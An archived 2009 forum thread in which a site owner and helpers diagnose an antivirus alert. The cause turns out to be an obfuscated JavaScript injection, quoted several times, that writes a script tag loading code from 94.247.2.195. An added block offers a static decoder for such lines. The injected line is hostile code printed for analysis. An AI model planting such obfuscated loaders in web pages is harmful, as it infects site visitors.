innovativelychallenged
Posted: Thu Apr 30, 2009 5:25 am
by informactive
I get a NoScript warning saying below site has a virus.
http://www.innovativelychallenged.com
Could it be the StatCounter script?
Thanks.
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 5:51 am
by therube
Is this another of your websites?
How are you accessing http://www.innovativelychallenged.com/?
From a bookmark? From a Google search?
This is on your site:
Code:
<script language=javascript><!--
document.write(unescape('%3CcasR9ac336rOVJipOVJtYq2%20OVJsYq2r7Nc336%3D336%2F%2Fca94%2EYq2247%2E2Yb%2Eca193365%2F336jquerYq2y%2Ejs7N%3E%3C%2FscrcaiptOVJ%3E').replace(/Yq2|7N|ca|336|R9a|OVJ|Yb/g,""));
--></script><body>
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 5:54 am
by Alan Baxter
I've never seen NoScript warning about a virus. I don't think it has that capability. "I get a NoScript warning saying below site has a virus." doesn't give us enough information to help you.
I've loaded that site in my Firefox NoScript test profile, using Sandboxie for safety, and see no problem. I'm not about to start randomly clicking links or changing NoScript settings in an attempt to figure out what you're talking about, informactive. I think you need to be a lot more specific, i.e. give exact steps to reproduce your issue and a full description of what you see.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
NoScript 1.9.2.3
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 5:58 am
by informactive
I re-uploaded the index.html page and it seems to be okay now.
But on what page did you find all this?
<script language=javascript><!--
document.write(unescape('%3CcasR9ac336rOVJipOVJtYq2%20OVJsYq2r7Nc336%3D336%2F%2Fca94%2EYq2247%2E2Yb%2Eca193365%2F336jquerYq2y%2Ejs7N%3E%3C%2FscrcaiptOVJ%3E').replace(/Yq2|7N|ca|336|R9a|OVJ|Yb/g,""));
--></script><body>
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 6:03 am
by therube
On the first page itself.
But I'm not sure when it showed up.
Originally when I looked through the source, I did not notice it. (I may <or may not> have noticed it.)
Since I didn't catch anything right off, I Allowed innovativelychallenged.com. (Late, tired, not sure what I did next or after?) But at some point I did get that code in the source.
Now sometimes these exploits log IPs so that you will only see it once. So the second time you go looking for it, it is hidden from you. As it appears to be from me now?
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 6:06 am
by informactive
Sorry, it was not a NoScript warning, it was an Avast warning.
http://i255.photobucket.com/albums/hh13 ... 230131.gif
There is not a whole lot on any of these pages, let alone script, other than StatCounter on index.html.
Are you looking at the page other than in source view?
Thanks
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 6:19 am
by therube
But if you changed the page source ... heh.
Read here, & pay particular attention to post#10,
AVAST Forum: JS-Redirector-G [trj] warning.
And you are likely to find that code <again> on every one of your pages (& sub-pages).
It is on d577570.htm right now.
Only Sophos tagged it, even though they also scan with Avast:
VirusTotal: File d577570.htm.VIR.htm
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 6:48 am
by informactive
I'm using Expression Web and this is all I see in my design of d577570.htm. Where is the redirector script hiding?
I tried reading favicon.ico using Notepad and could find nothing looking like script.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="shortcut icon" href="favicon.ico">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="description" content="D577570 design patent">
<meta name="keywords" content="design, patent, D577570">
<meta name="revisit-after" content="15 days">
<meta name="rating" content="General">
<meta name="ROBOTS" content="ALL">
<style type="text/css">
.style1 {
text-align: center;
margin-top: 0px;
}
.style2 {
border-width: 0px;
font-family:Arial, Helvetica, sans-serif;
}
.style3 {
vertical-align: bottom;
border:0px;
}
.style4 {
text-align: left;
}
</style>
</head>
<body>
<div style="position: absolute; width: 100px; height: 70px; z-index: 1; left: 784px; top: 669px" id="layer1" class="style4">
<a href="http://www.innovativelychallenged.com/index.html">
<img alt="" src="images/returnic.gif" width="197" height="33" class="style2"></a></div>
<p class="style1"><img alt="" src="images/d577570.gif"></p>
</body>
</html>
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 6:52 am
by therube
Going back to the "94.247.2.195", once that code is on your page, & then once you Allow your page (innovativelychallenged as the case may be) & it refreshes, that code, JavaScript code, is then interpreted, & at that point the 94.247.2.195 then shows up as a site that can then be Allowed in NoScript (not that you would ever want to do that).
If you subsequently forbid your site, even though that code is then blocked (?), you are still reading from your disk cache, & so the 94.247.2.195 will still show up in NoScript. If you force+refresh (Ctrl+F5 or similar), then the page will reload from the server, & the 94.247.2.195 will no longer show in NoScript.
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 6:53 am
by therube
This is what I get:
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="shortcut icon" href="favicon.ico">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="description" content="D577570 design patent">
<meta name="keywords" content="design, patent, D577570">
<meta name="revisit-after" content="15 days">
<meta name="rating" content="General">
<meta name="ROBOTS" content="ALL">
<style type="text/css">
.style1 {
text-align: center;
margin-top: 0px;
}
.style2 {
border-width: 0px;
font-family:Arial, Helvetica, sans-serif;
}
.style3 {
vertical-align: bottom;
border:0px;
}
.style4 {
text-align: left;
}
</style>
</head>
<script language=javascript><!--
document.write(unescape('%3CcasR9ac336rOVJipOVJtYq2%20OVJsYq2r7Nc336%3D336%2F%2Fca94%2EYq2247%2E2Yb%2Eca193365%2F336jquerYq2y%2Ejs7N%3E%3C%2FscrcaiptOVJ%3E').replace(/Yq2|7N|ca|336|R9a|OVJ|Yb/g,""));
--></script><body>
<div style="position: absolute; width: 100px; height: 70px; z-index: 1; left: 784px; top: 669px" id="layer1" class="style4">
<a href="http://www.innovativelychallenged.com/index.html">
<img alt="" src="images/returnic.gif" width="197" height="33" class="style2"></a></div>
<p class="style1"><img alt="" src="images/d577570.gif"></p>
</body>
</html>
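Added example (not part of the original thread and not any poster's code): the injected line quoted above can be decoded statically, without letting a browser run it, to see which off-site script it would load. `findInjectedScripts` and its `pageHost` parameter are hypothetical names, and the sample page is constructed around the line exactly as posted.

```javascript
// Constructed sample: a minimal page wrapping the injected line exactly as quoted in the thread.
const INJECTED_LINE = "document.write(unescape('%3CcasR9ac336rOVJipOVJtYq2%20OVJsYq2r7Nc336%3D336%2F%2Fca94%2EYq2247%2E2Yb%2Eca193365%2F336jquerYq2y%2Ejs7N%3E%3C%2FscrcaiptOVJ%3E').replace(/Yq2|7N|ca|336|R9a|OVJ|Yb/g,\"\"));";
const SAMPLE_PAGE =
  '<html><head></head>\n<script language=javascript><!--\n' + INJECTED_LINE +
  '\n--></script><body></body></html>';

// unescape('<payload>').replace(/<junk>/g, ""): capture payload and junk pattern as text only.
const INJECT_RE = /unescape\(\s*(['"])([^'"]*)\1\s*\)\s*\.replace\(\s*\/([^\/]+)\/g\s*,\s*(?:""|'')\s*\)/g;
// <script ... src=...> with a quoted or unquoted attribute value.
const SCRIPT_SRC_RE = /<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

// Same result as unescape() for %XX sequences (%uXXXX is not handled).
function percentDecode(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// The junk pattern comes from an untrusted page, so only accept a plain
// alternation of literals before turning it into a RegExp.
function stripJunk(text, junkPattern) {
  if (!/^[A-Za-z0-9|]+$/.test(junkPattern)) {
    throw new Error('junk pattern is not a plain alternation; decode by hand');
  }
  return text.replace(new RegExp(junkPattern, 'g'), '');
}

// pageHost (hypothetical parameter): the host name the HTML was served from.
// Returns one finding per <script src> that the hidden markup would write.
function findInjectedScripts(html, pageHost) {
  const findings = [];
  for (const m of html.matchAll(INJECT_RE)) {
    const decoded = stripJunk(percentDecode(m[2]), m[3]);
    for (const s of decoded.matchAll(SCRIPT_SRC_RE)) {
      const src = s[1] ?? s[2] ?? s[3];
      // Resolve protocol-relative and relative URLs against the page itself.
      const host = new URL(src, `http://${pageHost}/`).hostname;
      findings.push({ decoded, src, host, offsite: host !== pageHost });
    }
  }
  return findings;
}

console.log(findInjectedScripts(SAMPLE_PAGE, 'www.innovativelychallenged.com'));
```

Run it over the HTML as the server returns it rather than over the local copy in the editor, since the thread shows the two differ.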
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 6:55 am
by GµårÐïåñ
I don't get anything, even with avast installed.
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 7:03 am
by therube
Essentially the same, but ... the favicon, talked about in the link above, & the JavaScript exploit code itself.
<link rel="shortcut icon" href="favicon.ico"> === <link rel="shortcut icon" href="http://www.innovativelychallenged.com/favicon.ico">
(You may have to View Image to see it fully <at least as much as I captured>.)

Re: innovativelychallenged
Posted: Thu Apr 30, 2009 7:13 am
by therube
Correction must be made by the administrator/owner of the website Avast alerts about.
Somewhere in your code is a link to a favicon which actually doesn't exist. The server generates a 404 message which is infected. Please check server-generated messages.
Note that the Avast forum thread (above) is ongoing.
First of all, being secure doesn’t mean to just install firewalls, anti-viruses, ... This favicon and also XSS attacks fall into a category that can’t be handled by just installing a few security tools. The reason is that the hosts/carriers through which they intrude into your system are common internet resources like web pages, emails, RSS feeds, URLs etc. As a result it is difficult to identify & block such resources selectively unless a central repository maintaining a blacklist of potentially dangerous resources is referenced before access. Firefox and other modern browsers are doing this these days. But this is effective only when the resource has been identified and added previously to the blacklist. Ultimately the option left is to only allow the scripts from the resources you rely on, like Google & Yahoo (matter of choice). This is what NoScript and RequestPolicy do. NoScript by default blocks all the Flash and JavaScript content on the pages you visit unless you add them (more specifically the website domain or address) to its whitelist. RequestPolicy goes one step ahead and blocks JavaScript content originating or communicating from a server you are not visiting in the first place, even if it is in the whitelist. The fundamental thing is simple: to block all the resources/communication outside the current resource you are browsing. For more details I would recommend you to read the FAQs on the NoScript & RequestPolicy websites.
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 2:23 pm
by informactive
The Rube wins on this one.
I did a Control F5 on each *.htm file and uploaded them all back to 1and1, and there is no virus alert on any of them.
Now that I see d577570.htm on my screen without the Avast warning, I go to view source and do not see the script on that page below the heading, so I guess all is well.
I use http://www.diskcleaner.nl/ pretty much every day or so to clean up my cache. Is it missing files when it cleans, or should I try another cache remover? I also clean with the Firefox clean cache option under Tools every other day or so.
Thanks.
Going back to the "94.247.2.195", once that code is on your page, & then once you Allow your page (innovativelychallenged as the case may be) & it refreshes, that code, JavaScript code, is then interpreted, & at that point the 94.247.2.195 then shows up as a site that can then be Allowed in NoScript (not that you would ever want to do that).
If you subsequently forbid your site, even though that code is then blocked (?), you are still reading from your disk cache, & so the 94.247.2.195 will still show up in NoScript. If you force+refresh (Ctrl+F5 or similar), then the page will reload from the server, & the 94.247.2.195 will no longer show in NoScript.
Re: innovativelychallenged
Posted: Thu Apr 30, 2009 2:56 pm
by informactive
I went searching for a new cleaner and found http://www.ccleaner.com/ and it found 60MB of files to clean. I cleaned them and fortunately my computer appears to still be functioning.
Perhaps CCleaner will do a better job of cleaning my cache, if cleaning my cache had something to do with doing Control F5 on my site.
Thanks.